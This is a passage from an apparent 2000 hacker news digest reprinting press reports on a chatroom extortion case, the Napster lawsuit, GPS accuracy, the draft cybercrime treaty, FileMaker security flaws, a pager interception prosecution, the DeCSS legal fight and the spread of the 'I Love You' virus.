~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by Evil Wench
Cheng Tsz-chung, 22, was behind bars last night after changing the
password on another user's account and then demanding HK$500 to change
it back. The victim paid the money and then contacted police. It is
unknown how Police tracked down Mr. Cheng. He has pleaded guilty to
one charge of unauthorized access to a computer and two counts of
theft. The magistrate remanded Cheng in custody and said his sentence,
which will be handed down on May 10 pending reports, must have a
deterrent effect. Cheng's lawyer told the Magistrate that his client
committed the offenses "just for fun". (The just for fun defense?
That's a new one.)
South China Morning Post
http://www.technologypost.com/internet/DAILY/20000427134721295.asp?Section
Published on Thursday, April 27, 2000 INTERNET
Hacker demanded HK$500 for chatroom password ELAINE PAK LI
--------------------------------------------------------------------------
A computer hacker was behind bars last night after breaking into a
man's on-line chatroom account, changing his password and demanding HK$500
to change it back. When Lee Kei, 21, found that his account's password had
been changed by computer technician Cheng Tsz-chung in July last year, he
opened another account to enter the chatroom and discuss the matter with
the hacker, Eastern Court heard.
During their on-line exchanges, Cheng, 22, tested Mr Lee's computer
knowledge by asking him several complicated questions, none of which Mr
Lee could answer, the court heard.
Cheng then refused to release Mr Lee's account, instead offering to sell
it back to him. The victim deposited $500 into Cheng's bank account the
next day and reported the matter to police.
Cheng was arrested in March when he was coincidently stopped and searched
by a police officer in Tsim Sha Tsui, the court heard.
He pleaded guilty to one charge of unauthorised access to a computer and
two counts of theft.
Cheng's lawyer told Magistrate Ian Candy that his client, who had no
previous criminal record, committed the offences "just for fun".
Mr Candy said: "Not only did you break into another person's account and
use it yourself, you even asked for money when you were discovered."
The magistrate remanded Cheng in custody and said his sentence, which will
be handed down on May 10 pending reports, must have a deterrent effect.
@HWA
144.0 [HNN] FMA and SM Release CD
~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 2nd
contributed by Nick
Freaks Macintosh Archives and Secure Mac have teamed up to create the
most up to date CD filled with Macintosh security and hacking related
tools in existence. The CD combines the old Whacked Mac Archives with
the new archives of Securemac.com and freaky.staticusers.net. All for
only $20.
Secure Mac
Freaks Macintosh Archives
http://www.securemac.com/securemacfma.html
http://freaky.staticusers.net/
@HWA
145.0 [HNN] Metallica Claims It has 300,000 Individual Names of Napster Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Rapier311
Metallica claims that it has discovered the names of 335,435
individuals who have used Napster to trade their songs. The band hired
'NetPD' to do the research over the weekend to come up with the names.
Metallica plans to offer the names to Napster first before adding them
into the lawsuit. (Be interesting to know how NetPD came up with that
list and how accurate it is.)
C|Net
http://technews.netscape.com/news/0-1005-200-1798138.html?tag
@HWA
146.0 [HNN] President Sets GPS to Full Force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Maggie
The Global Positioning System has been purposely crippled for civilian
use since its inception. Now President Clinton has decided that
civilians should get the same use of GPS as the military by disabling
the degradation of the signal or Selective Availability. Degradation
of the civilian signal was originally to prevent foreign nations from
having the same advantage as us but the US has demonstrated the
capability to selectively deny GPS signals on a regional basis during
times of conflict so the Selective Availability is no longer
necessary. The removal of Selective Availability will increase
Civilian GPS accuracy from 100 to 10 or 20 meters. (Wow, this should
mean some real cool GPS products should hit the market soon.)
The White House
Federal Computer Week
http://www.whitehouse.gov/library/PressReleases.cgi?date
http://www.fcw.com/fcw/articles/2000/0501/web-gps-05-02-00.asp
June 18, 2000
STATEMENT BY THE PRESIDENT
Forwarded by Megan C. Moloney/WHO/EOP on 06/18/2000
09:07 AM
Megan C. Moloney
06/18/2000 09:07:12 AM
Record Type: Record
To:
cc:
Subject: Statement by the President: Ethiopia and Eritrea
THE WHITE HOUSE
Office of the Press Secretary
For Immediate Release June 18, 2000
STATEMENT BY THE PRESIDENT
Today in Algiers, Ethiopia and Eritrea signed an agreement to cease
hostilities. This is a breakthrough which can, and should end the tragic
conflict in the Horn of Africa. It can, and should permit these two
countries to realize their potential in peace, instead of squandering it in
war.
I commend the Organization of African Unity, and especially its chair
Algerian President Abdelaziz Bouteflika, for leading the negotiation of
this agreement. I am grateful to my envoy, former National Security
Advisor Anthony Lake, to Assistant Secretary of State Susan Rice and to my
senior advisor on African Affairs Gayle Smith for their tireless pursuit of
a peaceful resolution to this conflict. The United States has supported
the OAU in this effort and we will continue to do so. I have asked Tony
Lake to return to Algiers to work with the OAU as we enter the next round
of negotiations.
I hope this commitment by Ethiopia and Eritrea to stop the fighting also
signals their commitment to build the peace. I urge them to use the next
round of talks to produce a final, comprehensive, lasting agreement, so
they can get on with the work of pursuing democracy and development for
their people. Ethiopia and Eritrea are America's friends. If they are
ready to take the next step, we and our partners in the international
community will walk with them.
# # #
Civil GPS accuracy boosted BY Paula Shaki Trimble
What is GPS?
GPS is a system of at least 24 orbiting satellites operated by the Defense
Department that provides accurate positioning and timing information to
users on the ground, in the air or in space. GPS is used to guide
missiles, navigate civilian aircraft and time cellular communications
handoffs from one base station to another.
05/02/2000 President Clinton on Monday delivered on a 4-year-old promise
to improve the accuracy of the Global Positioning System to civil users.
In a presidential directive in 1996, Clinton promised to revisit the issue
of intentionally degrading the civil GPS signal in 2000. He had promised
to discontinue use of the degradation capability -- known as selective
availability -- by 2006, with an annual assessment of its continued use
beginning this year.
Selective availability was deactivated at midnight on Monday, the
president's science adviser, Neal Lane, announced during a press briefing
earlier in the day.
The decision came early because the Defense Department has sufficiently
proven its ability to deny the GPS signal to adversaries in a specific
region while maintaining availability to users elsewhere, said Arthur
Money, the Pentagon's assistant secretary of Defense for command, control,
communications and intelligence.
Selective availability caused the civil GPS signal to be accurate within
100 meters. Without selective availability, users will receive position
information accurate within 10 to 20 meters.
While the modification significantly improves the accuracy of the GPS
signal, the Transportation Department is still committed to developing
systems that augment the GPS capability, said Eugene Conti, assistant
secretary of Transportation for transportation policy. Those systems, such
as the Federal Aviation Administration's Wide-Area Augmentation System and
Local-Area Augmentation System and the Coast Guard's National Differential
GPS System, verify that the GPS signal is reliable.
@HWA
147.0 [HNN] New Cyber Crime Treaty Making the Rounds
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Evil Wench
The 'Draft Convention on Cybercrime', written in part by US law
enforcement, is currently circulating among 40 countries for approval.
If enacted, the proposal would outlaw software designed or adapted to
gain access to a computer system without permission and
interference with the 'functioning of a computer system' by deleting
or altering data, force people to give up their encryption keys, and
require ISPs to collect info about their users.
Wired
Draft Convention on Cybercrime
http://www.wired.com/news/politics/0,1283,36047,00.html
http://www.politechbot.com/docs/treaty.html
Cybercrime Solution Has Bugs by Declan McCullagh 3:00 a.m. May. 3, 2000
PDT
WASHINGTON -- U.S. and European police agencies will receive new powers to
investigate and prosecute computer crimes, according to a preliminary
draft of a treaty being circulated among over 40 nations.
The Council of Europe's 65KB proposal is designed to aid police in
investigations of online miscreants in cases where attacks or intrusions
cross national borders.
But the details of the "Draft Convention on Cybercrime" worry U.S. civil
libertarians. They warn that the plan would violate longstanding privacy
rights and grant the government far too much power.
The proposal, which is expected to be finalized by December 2000 and
appears to be the first computer crime treaty, would:
Make it a crime to create, download, or post on a website any computer
program that is "designed or adapted" primarily to gain access to a
computer system without permission. Also banned is software designed to
interfere with the "functioning of a computer system" by deleting or
altering data.
Allow authorities to order someone to reveal his or her passphrase for an
encryption key. According to a recent survey, only Singapore and Malaysia
have enacted such a requirement into law, and experts say that in the
United States it could run afoul of constitutional protections against
self-incrimination.
Internationalize a U.S. law that makes it a crime to possess even digital
images that "appear" to represent children's genitals or children engaged
in sexual conduct. Linking to such a site also would be a crime.
Require websites and Internet providers to collect information about their
users, a rule that would potentially limit anonymous remailers.
U.S. law enforcement officials helped to write the document, which was
released for public comment last Thursday, and the Justice Department is
expected to urge the Senate to approve it next year. Other non-European
countries actively involved in negotiations include Canada, Japan, and
South Africa.
During recent testimony before Congress, Attorney General Janet Reno
warned of international computer crime, a claim that gained more
credibility last month with the arrest of alleged denial-of-service
culprit Mafiaboy in Canada.
"The damage that can be done by somebody sitting halfway around the world
is immense. We have got to be able to trace them, and we have made real
progress with our discussions with our colleagues in the G-8 and in the
Council of Europe," Reno told a Senate appropriations subcommittee in
February, the week after the denial-of-service attacks took place.
"Some countries have weak laws, or no laws, against computer crimes,
creating a major obstacle to solving and to prosecuting computer crimes. I
am quite concerned that one or more nations will become 'safe havens' for
cyber-criminals," Reno said.
Civil libertarians say the Justice Department will try to pressure the
Senate to approve the treaty even if it violates Americans' privacy
rights.
"The Council of Europe in this case has just been taken over by the U.S.
Justice Department and is only considering law enforcement demands," says
Dave Banisar, co-author of The Electronic Privacy Papers. "They're using
one more international organization to launder U.S. policy."
Banisar says Article 6 of the measure, titled "Illegal Devices," could ban
commonplace network security tools like crack and nmap, which is included
with Linux as a standard utility. "Companies would be able to criminalize
people who reveal security holes about their products," Banisar said.
"I think it's dangerous for the Internet," says Barry Steinhardt,
associate director of the American Civil Liberties Union and a founder of
the Global Internet Liberty Campaign. "I think it will interfere with the
ability to speak anonymously."
"It will interfere with the ability of hackers -- using that term in a
favorable light -- to test their own security and the security of others,"
Steinhardt said.
Solveig Singleton, director of information studies at the libertarian Cato
Institute, says it's likely -- although because of the vague language not
certain -- that anonymous remailers will be imperiled.
The draft document says countries must pass laws to "ensure the
expeditious preservation of that traffic data, regardless whether one or
more service providers were involved in the transmission of that
communication." A service provider is defined as any entity that sends or
receives electronic communications.
Representing the U.S. in the drafting process is the Justice Department's
Computer Crime and Intellectual Property section, which chairs the G-8
subgroup on high-tech crime and also is involved with a cybercrime project
at the Organization of American States. In December 1997 Reno convened the
first meeting on computer crime of the G-8 nations.
A recent White House working group, which includes representatives from
the Justice Department, FBI, and Secret Service has called for
restrictions on anonymity online, saying it can provide criminals with an
impenetrable shield. So has a report from a committee of the European
Parliament.
Other portions of the treaty include fairly detailed descriptions of
extradition procedures and requirements for countries to establish
around-the-clock computer-crime centers that police groups in other
countries may contact for immediate help.
The Council of Europe is not affiliated with the European Union, and
includes over 40 member nations, including Russia, which joined in 1996.
After the Council of Europe's expert group finalizes the proposed treaty,
the full committee of ministers must adopt the text. Then it will be sent
to countries for their signatures. Comments can be sent to daj@coe.int.
@HWA
148.0 [HNN] Vulnerabilities Found in FileMaker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by acopalyse
FileMaker Pro 5 database package has security flaws in the Web
Companion software. These flaws allow Internet users to view the
contents of online Web Companion databases and access the plug-in's
e-mail functions without authorization. A third flaw allows
unauthorized users to send anonymous or impersonated e-mail. FileMaker
says that no customers have yet complained about this problem.
MacWeek
http://macweek.zdnet.com/2000/04/30/0501fmresponds.html
Monday, May 1, 2000 FileMaker admits security flaws FileMaker on Monday
issued a statement confirming security flaws in the Web Companion software
that's part of the company's FileMaker Pro 5 database package. The flaws,
first reported by software developer Blue World Communications, make it
possible for Internet users to view the contents of online Web Companion
databases and access the plug-in's e-mail functions without authorization.
A third flaw allows unauthorized users to send anonymous or impersonated
e-mail.
Web Companion is a plug-in that allows users to post FileMaker databases
on the Web.
"At this point, we know of no customers who have experienced problems due
to these issues, and these issues only concern users publishing FileMaker
databases via our Web Companion," FileMaker public relations manager Kevin
Mallon said in the statement. "But because the security of our customers'
data is and always has been an overriding priority at FileMaker, we are
committed to sharing what we know quickly and accurately.
"More importantly, we intend to fully investigate and address any bugs as
quickly as possible. Resolving these issues is a top priority for
FileMaker."
Mallon wrote that "some technologies in the Web Companion may
inappropriately expose field contents which the user thinks are protected
by Field-Level Security. FileMaker intends to address this problem as soon
as possible."
Until FileMaker issues a fix, he said that users should be aware that Field-Level
Security may not be reliable, and suggested alternative security schemes,
such as password protection in FileMaker or Function-Level Security in the
Web Security Database.
Mallon advised Web administrators concerned about the e-mail flaw to
activate Web Companion's Logging feature--accessed through Preferences--to
track requests sent to the plug-in. "This is a good general practice in
any case," he wrote.
Blue World said that customers can set up the company's Lasso Web Data
Engine as a secure proxy for Web Companion databases, allowing use of
Lasso's security features to restrict access. Other alternatives include
disabling Web Companion or using an earlier version of FileMaker.
@HWA
149.0 [HNN] Internet Threat gets Four Months
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by Code Kid
An 18-year-old student has been sentenced to four months in jail for
issuing a threat over the Internet. Michael Ian Campbell had pleaded
guilty last February to 'transmitting a threat of violence' against
Columbine High School via an Internet chat room. His lawyer attempted a
novel defense based on 'Internet intoxication.' (Yes, Columbine was a
tragedy but if this threat had been made face to face I'd bet no one
would have even taken it seriously let alone arrest the guy and give
him four months.)
Newsbytes - via Computer User
http://www.currents.net/news/00/05/02/news2.html
Daily News Teen Sentenced in Columbine Web Threat By Martin Stone,
Newsbytes May 02, 2000
A judge in Denver has reportedly handed down a four-month prison sentence
to an 18-year-old Florida man convicted of sending a chat-room message
threatening violence at Columbine High School, scene of a shooting spree
last year which claimed 15 lives.
A Reuters report Monday said the teen, Michael Ian Campbell, collapsed in
the courtroom after being handed the sentence. Campbell pleaded guilty in
February to "transmitting a threat of violence" across state lines. His
lawyer attempted a novel defense based on "Internet intoxication."
The report said a Columbine student, 16-year-old Erin Walton, was in a
chat room on Dec. 15 when Campbell told her to stay away from school the
next day because he planned to "finish what begun," which authorities
argued made a clear reference to the massacre and led school officials to
cancel classes for two days.
Campbell is reported to be suffering from depression and had attempted
suicide following his arrest at his Florida home after officials at
America Online helped police trace the origin of the message. He has since
apologized for the episode, and prosecutors had recommended a light
sentence. But, the judge maintained that though he could have given
Campbell probation or a sentence of up to six months, he felt the
four-month sentence would serve as a deterrent to others, the report said.
Reported By Newsbytes.com, http://www.newsbytes.com .
@HWA
150.0 [HNN] Dissemination of Pager Traffic Not Needed For Violation of Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 3rd
contributed by root66
Kevin Sills, a police officer in New York City, was charged that
between 1996 and 1998, Mr. Sills possessed software that was
programmed to intercept alphanumeric pager messages -- a violation of
§2512(1)(b) of the Electronics Communications Privacy Act. It also
charged Mr. Sills with violating §2511(1)(a) of the act by
intercepting such messages. Mr. Sills claimed that since there was
dissemination of the interception, either for profit or other reasons,
that the law should not apply. Senior Judge Shirley Wohl Kram
disagreed and has refused to dismiss the case.
The National Law Journal
http://www.nylj.com/stories/00/05/050200a1.htm
Pager Eavesdropping Trial OK'd
BY MARK HAMBLETT New York Law Journal Tuesday, May 2, 2000
A CHALLENGE to a federal prosecution under the Electronics Communications
Privacy Act involving eavesdropping of alphanumeric pagers has been
rejected by a Southern District judge.
Senior Judge Shirley Wohl Kram refused to dismiss a case against a New
York City police officer who allegedly used software to read paging
messages by the police department.
Judge Kram rejected arguments by the officer that reading the pages is not
forbidden under the act, and that he was the victim of selective
prosecution in the case, United States v. Sills, 99 Cr. 1133.
Kevin Sills, a police officer for the city since 1996, was the subject of
a sting operation in 1998 by a criminal investigator working for the U.S.
Attorney's Office.
The two-count indictment charged that between 1996 and 1998, Mr. Sills
possessed software that was programmed to intercept alphanumeric pager
messages -- a violation of §2512(1)(b) of the act. It also charged Mr.
Sills with violating §2511(1)(a) of the act by intercepting such messages.
The software, called "Message Tracker," is manufactured by a Texas company
called K & L Technology. When used in conjunction with a radio scanner,
Message Tracker can be used to intercept messages from the targeted pager
and display them on a computer.
In phone conversations with an employee of K & L Technology who was
cooperating with the investigator, Mr. Sills allegedly said that he had
been reading other pagers, asked the employee if the company would modify
his scanner so it worked in conjunction with a more advanced version of
Message Tracker and then ordered the modifications to be done.
Investigator Ronald G. Gardella, posing as a Federal Express delivery man,
then delivered to Mr. Sills' home his newly modified scanner and the
latest version of Message Tracker software. An ensuing search of the
premises allegedly turned up a computer file containing "Capcodes," which,
along with specific radio frequency, make up the electronic address for
pagers and distinguishes them from other pagers. Prosecutors charged that
one of the Capcodes in that file belonged to the pager used by the body
guard and driver for Police Commissioner Howard Safir.
Mr. Sills moved to dismiss the charges before Judge Kram.
First, he said his conduct was exempt under §2511(g) of the act, which
excludes any radio communication transmitted by any governmental, law
enforcement or public communications system "readily accessible to the
general public."
Quoting the statute, Judge Kram said the act defines "readily accessible"
as radio communications that are not "transmitted over a communication
system provided by a common carrier, unless the communication is a tone
only paging system communication."
Not 'Tone Only'
She said it was "undisputed" that the communications being intercepted by
Mr. Sills were not "tone only" transmissions, and therefore, the
transmissions at issue were not "readily accessible to the general
public."
Mr. Sills argued that he was singled out because he was a police officer
and said that "this case appears to be the first prosecution, in this
district or anywhere, involving alphanumeric pager interceptions when
there is no dissemination of the intercepted information."
He said the equipment he used was advertised on the open market and the
government has never chosen to prosecute news organizations and private
individuals who "knowingly pay for intercepted police pager
communications."
Mr. Sills said that when the government prosecuted the Breaking News
Network for profiting from the dissemination of intercepted pager
information, including police messages, the government did not prosecute
people or news organizations who paid for BNN's service.
Judge Kram disagreed.
"Whereas BNN's customers obtained pager messages through a purported
'service provider,' Sills directly intercepted them," she said.
Assistant U.S. Attorney David Raskin represented the government. Bradley
D. Simon represented Mr. Sills.
@HWA
151.0 [HNN] 2600 Secures Big Time Lawyer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by jandrews
Emmanuel Goldstein has retained the services of New York lawyer Martin
Garbus in his case against the MPAA regarding his posting of DeCSS to
his web site. Garbus has defended such luminaries as Lenny Bruce,
Timothy Leary, and George Wallace. He has won all 20 of his arguments
before the Supreme Court. Garbus plans to argue that DeCSS is an
innovation in interoperability, and therefore protected under the "fair
use" principle of the First Amendment.
"There is little question in my mind this persecution of hackers is,
in many respect, analogous to the Communist red-baiting of yore. They
are being unfairly maligned, and stigmatized, without due cause." -
Martin Garbus
Village Voice
http://www.villagevoice.com/issues/0018/howe.shtml
DOWN BY LAW
BY JEFF HOWE
When Movie Moguls Wage War to Protect Copyright, the First Amendment Ends
Up on the Cutting Room Floor
In the world of Martin Garbus, we are all teachers and he is the student.
This at least partly explains why an otherwise innocent DVD player lies in
pieces on the coffee table in his Madison Avenue law office. The teacher
today is Chris DiBona, prominent evangelist of the open-source creed--the
belief that computer code, like speech, wants to be free.
DiBona is teaching Garbus, who only recently learned how to work his own
e-mail, why a minuscule bit of silicon in this player--and an equally
minuscule program built to bypass it--have sparked a federal case that will
determine whether we pass through the digital age with the First Amendment
intact.
As DiBona speaks, pointing at various organs in the innards of the DVD
player, Garbus leans forward and listens intently. Very intently. You can
almost hear the sound of files shifting and expanding inside Garbus's
cerebrum. The force of this man's concentration could bend spoons, or
laws. "I chose this life so I could forever remain a student," Garbus
says, in a not-infrequent display of mock humility.
This life, as it happens, has also allowed Garbus to remain a high-profile
rebel. Perhaps the closest thing in New York to a modern-day Daniel
Webster, Garbus has made a living by fighting the dark side in all its
forms. A laundry list of Garbus's clients reveals a Zelig-esque talent for
being on the right side of the right fight at the right time. Garbus
fought for Lenny Bruce in '64, for Timothy Leary in '66, and against
Alabama governor George Wallace in '68. A few years later he hid the
Pentagon Papers in his attic for reporter Daniel Ellsberg. He has argued
before the Supreme Court on 20 occasions, winning each time. Garbus has
fought to protect the copyright of work by Samuel Beckett, Robert Redford,
Al Pacino, and John Cheever.
[Photo caption: The hacker's writer: Web scribe Eric Corley launched a
First Amendment fight when he posted a program that breaks the code of
DVDs.]
So why has Garbus, with his eye for the limelight and his zeal for the
sanctity of intellectual property, taken on the cause of a Long Island
cyberjournalist accused by the Motion Picture Association of America of
being a copyright thief?
"He gets it," says his client, Eric Corley, publisher of the quarterly
journal 2600 (www.2600.com), commonly referred to as the "hacker bible,"
and enemy number one of big Hollywood.
Last fall Corley, who goes by the nom de Net of Emmanuel Goldstein, posted
to 2600 a program that allows technology-savvy folk to decipher the code
of DVDs and then view the films on unlicensed players. The open-source set
calls this a First Amendment right. Hollywood calls it piracy and fears a
brave new world where people get their movies on the Web for free. In
January, the motion picture association slapped Corley and two other
defendants with a federal suit alleging copyright violation.
When Corley says Garbus "gets it," he's offering no light praise, since
factual error, bald deception, and simple misunderstanding have obscured
what initially looked like an open-and-shut case for the motion picture
industry. The movie moguls are banking on the Digital Millennium Copyright
Act of 1998, which expressly forbids providing anything "primarily
designed or produced for the purpose of circumventing a technological
measure that effectively controls access to a [copyrighted] work." In
plain English, that means you can't hand out a tool that breaks through
copyright protection.
The tool now in question is DeCSS, which appears to smash those barriers,
bypassing the Content Scrambling System that guards DVDs and allowing
users to do with the contents what they will.
Armed with that premise, Hollywood took round one by a rout in January, as
a federal district judge granted an injunction that blocked Corley and the
other defendants (who have since been dropped from the suit) from posting
DeCSS. But Corley battled back, posting a collection of links to sites
around the world willing to offer the program. That prompted the motion
picture association last month to ask that the injunction be extended to
ban such links.
By any account except Hollywood's, granting the request would be an
egregious gagging of free expression. A newspaper like this one, for
instance, would be forbidden from telling its readers how to find the
source code to DeCSS on cryptome.org. This so-called prior restraint is a
special bugbear of the fourth estate. No surprise, then, that The New York
Times has expressed its concern and may file a brief on behalf of Garbus
and his client.
For his part, Garbus will submit that DeCSS is an exercise in
cryptography, an innovation in interoperability, and protected speech to
boot. Under that argument, the program should be covered by the "fair use"
principle of the First Amendment--putting the Digital Millennium Copyright
Act and freedom of expression at irreconcilable odds.
The case for the defense does not look good. The entertainment industry is
garnering court victories in the fight between the right of commerce to
protect intellectual property and the right of Netizens like Corley to
speak their minds. Last week, a federal judge in New York ruled for the
Recording Industry Association of America in its copyright infringement
suit against MP3.com, which allows users to post and download CDs for
online listening.
Garbus knows lower courts are not often inclined to contradict Congress,
so he's already plotting strategies for appeal all the way to the Supreme
Court. The matter is being closely followed by Internet wonks, pundits,
and practitioners, not to mention those civil libertarians who "get it."
"If the judge finds for the plaintiff, and the decision isn't knocked down
on appeal," says Yochai Benkler, a professor of information law at New
York University, "it will create an environment that's closed like nothing
we've ever seen before."
Welcome to the latest front in the war for the First Amendment.
--------------------------------------------------------------------------
Eric Corley looks like a hacker. All stringy black hair, pale skin, and
hunched shoulders, Corley has the unmistakable pallor of someone who
spends most of his time alone in front of a computer screen. Hollywood
could not have picked a better physical specimen for their relentless
campaign to portray the open-source community--programmers and users of
operating systems and software whose source code is freely available--as
"thieves and pirates."
But Corley fails that test in one important regard: He does not hack. He
"couldn't hack his way into a paper bag," says one ex-hacker who,
naturally, chooses to remain anonymous.
No electronic trespasser, Corley is a journalist--and not one lacking in
considerable credentials. His journal 2600, founded in 1984, boasts a
circulation of 60,000. Between 10,000 and 15,000 visitors drop by the
site. Corley hosts a weekly radio broadcast and has appeared on numerous
talk shows, including Charlie Rose, Nightline, and 60 Minutes. He has
testified before Congress and written editorials for the Times and the
Daily News. He gave the commencement address when he graduated from SUNY
Stony Brook. He says the movie moguls didn't know how much fight they'd
get when they homed in on him. "It was foolish of them to pick [2600],"
Corley says. "We've always stood up against this kind of thing. We don't
know how to back down."
The fact that Corley is a scribe for the hacker world may make him a
likely suspect for the motion picture association, but not necessarily a
wise one. Corley counts among his admirers--and readers--countless
programmers and academics. Oddly, the same logic that made him a target
for the movie industry also made him a client that Garbus couldn't pass
up.
In the DVD trial, the First Amendment lawyer found a story with clearly
drawn opponents worthy of a pulp-fiction plot: a powerful, wealthy
industry versus a corps of overworked, denigrated protectors of civil
liberties. This is white hats against black hats, heroes facing up to
villains, good law butting heads with bad.
With self-righteous zeal, the motion picture association has harassed open
sourcers and free-speech advocates who have posted, or merely linked to,
the program once offered by Corley. Soon after Hollywood realized movie
discs had been hacked, they fired a salvo of cease-and-desist letters to
anyone offering DeCSS. On December 28, the trade organization in charge of
licensing movie rights for DVD players filed suit in California, naming 21
individuals and "Does 1-500, inclusive." That's Does as in John, a deft
bit of legal language that allows the plaintiff to attack retroactively
anyone it chooses. In mid January, Norwegian authorities raided the Oslo
home of 16-year-old Jon Johansen, who is accused of first providing DeCSS
on the Web.
From the beginning, the movie association has made little effort to
disguise its enmity toward the hacker community, calling them "nerds" and
"anarchists." The group has sent cease-and-desist letters to people in
Germany and Australia, places far outside the jurisdiction of injunctions
issued in the United States. A 2600 correspondent in Connecticut has been
targeted with another federal suit, and a University of Wisconsin student
was fired from his job at a computer lab after a letter from Hollywood
landed on his boss's desk.
For Garbus, the plight of the open-source community is clear. "There is
little question in my mind this persecution of hackers is, in many
respect, analogous to the Communist red-baiting of yore," he says. "They
are being unfairly maligned, and stigmatized, without due cause."
According to John Gilmore, the co-founder of the Electronic Frontier
Foundation, a civil-liberties group that has picked up the defense tab in
all the DVD suits, the program Corley posted was originally one part of an
open-source project to develop a movie disc player for the Linux operating
system favored by hardcore programmers. Linux supporters saw Hollywood's
tactics as a call to arms. They posted thousands of copies of DeCSS
throughout the Web as a show of support for Corley.
And if the online proliferation weren't enough, the lawyers representing
Hollywood accidentally entered the entire DeCSS source code into the
public record.
All this for a program that Corley and much of the computing community
insist doesn't even do what the film executives say it does: encourage the
copying of DVDs. Corley argues DeCSS exists solely to allow people to view
movies they own on unlicensed players, like ones that run on Linux--an
operating system Hollywood refused to license. "You have to wonder, why
are they so upset at people knowing how to use their technology?" Corley
says. "They don't care about copying. Copying is easy. People have been
copying for ages. There are whole warehouses in Asia copying DVDs and
nothing else."
Yet when the film industry first filed suit in California last November,
president Jack Valenti raised the specter of marauding hackers and thieves
out to defraud Hollywood. Valenti told Daily Variety: "[W]e don't have
broadband access today, so we don't have many [pirated] movies on the
Internet today . . . By the middle or end of next year, we will have an
avalanche."
But a month before Valenti's apocalypse was scheduled to appear, a lawyer
for the industry group admits he, the former deputy director of the
antipiracy division, has yet to uncover a single instance of piracy using
DeCSS. "Do I know of any incidents of piracy, personally? No," says Greg
Goeckner. "But I would have to check with my team in the field."
The movie association may have a hard time uncovering any pirates sailing
under the DeCSS flag. Gilmore, of the Electronic Frontier Foundation,
explains that DVD movies are far too big for easy duplication. "The only
place you could store your movie would be on your hard drive," he says,
"and even then you could only hold four such movies at most." Gilmore also
points out that it could take hundreds of hours to download a DVD over a
56k modem, so merely transferring these files would mean disabling your
computer for weeks, all for the purpose of gaining a bootleg copy of The
Matrix. The film association hasn't found any instances of DeCSS piracy
for one simple reason: There's no cause to do it.
--------------------------------------------------------------------------
If DeCSS isn't likely to be used for pirating movies, why does the program
pose a threat so dire that Hollywood turned to the courts for relief?
This will be one of Garbus's first questions, if he ever sees the
courtroom on Corley's behalf. On April 25, attorneys for the movie
association filed a motion to disqualify Garbus from the case. Garbus's
firm, it turns out, represents Scholastic in an unrelated case. Time
Warner, a member of the association, owns Scholastic, and you're not
supposed to defend and attack the same client at the same time. This
technicality may be enough to kick Garbus out of the suit. "He probably
has a 50-50 chance," speculated one legal observer close to the action.
If Hollywood wins, Garbus is gone, barred from appearing for Corley as
counsel. The Electronic Frontier Foundation and Corley go back to
soliciting solicitors, their appeal enhanced through association with
Garbus.
If the motion fails, the movie execs will have a formidable foe on their
hands. War is hell and so is law, and Garbus sees little difference
between the two.
But a firebrand trial lawyer isn't all Corley gets. Garbus is an icon of
"East Coast Code," a term coined by Lawrence Lessig to describe the legal
code. Garbus must now convince the court to consider the rights of "West
Coast Code," or source code.
He will argue that DeCSS falls under the First Amendment's fair-use
exception to the Copyright Act. The doctrine of fair use permits, for
example, a reporter to quote paragraphs from a book or print sections of a
pamphlet.
In the case of DVDs, the only way a consumer can copy specific portions is
to use DeCSS. Barring people from doing that is a more insidious
encroachment on individual liberty than it first appears. "Say you want to
criticize the liberal leanings of Hollywood, or criticize the sexist movie
of this or that," says Benkler, the NYU law professor. "You need to be
able to quote little pieces of the movie. You can do that under the
copyright law, because that's fair use, but using DVDs lawfully as the
[film association] reads the law, you can't do that. This really
extinguishes user privilege to an unprecedented degree."
This same privilege was tried--and survived--in an oft-cited suit in 1984
involving Betamax, which manufactured early video recorders. The question
then was the same one asked now: whether the entertainment industry's
right to safeguard its products carries more weight than the right of
individuals to access copyrighted works for their own expressive, and
protected, ends.
The First Amendment also protects a process called reverse-engineering,
which was used to create DeCSS. Reverse engineers take things apart in
order to learn how to put them back together in a better form.
In other words, to build a better mousetrap. The right to take things
apart--whether breakfast cereals or pharmaceutical compounds--is a
time-honored tenet in American law, held to encourage innovation.
So far, judges have been friendly to reverse engineers. This year, the
Ninth U.S. Circuit Court of Appeals ruled that Connectix's Virtual Game
Station, which allows Mac users to play Sony PlayStation games on their
computers, had not violated copyright law because it was
reverse-engineered from PlayStation.
In the case of DeCSS, the upshot is that the program is already out there.
The DVD encryption was a flimsy system that everyone in the open-source
world knew would be hacked, sooner rather than later. East Coast Code may
enjoin open-source programmers and "pirates" from posting and trading
DeCSS, but with an estimated 300,000 copies already in existence, only
West Coast Code, i.e., a better encryption scheme, is going to maintain
Big Hollywood's grip on user privilege. In the Wild, Wild Web, you're
responsible for your own fences. East Coast Code don't mean shit.
Tell us what you think. editor@villagevoice.com
@HWA
152.0 [HNN] Virus Says 'I Love You'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by Evil Wench
A virus making the rounds of Asia is very similar to Melissa but has a
subject of "I Love You". The fast spreading virus has already hit
several dozen businesses in Hong Kong clogging their email systems.
Wall Street Journal - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2561663,00.html
'I love you' e-mail virus spreading
A Melissa-like computer virus, bearing the title 'I love you,' is
sweeping through Asia and appears to be spreading worldwide.
WSJ Interactive Edition May 4, 2000 4:40 AM PT
HONG KONG -- A computer virus spread by e-mail messages bearing the title
"I Love You" spread through Asian businesses Thursday afternoon, and
appeared to be quickly tainting computer systems world-wide. If the
attachment holding the virus is opened, the virus apparently multiplies by
finding other e-mail addresses and prompting the computer to generate new
e-mail. Victims sometimes receive dozens of e-mail messages, all
contaminated with the virus.
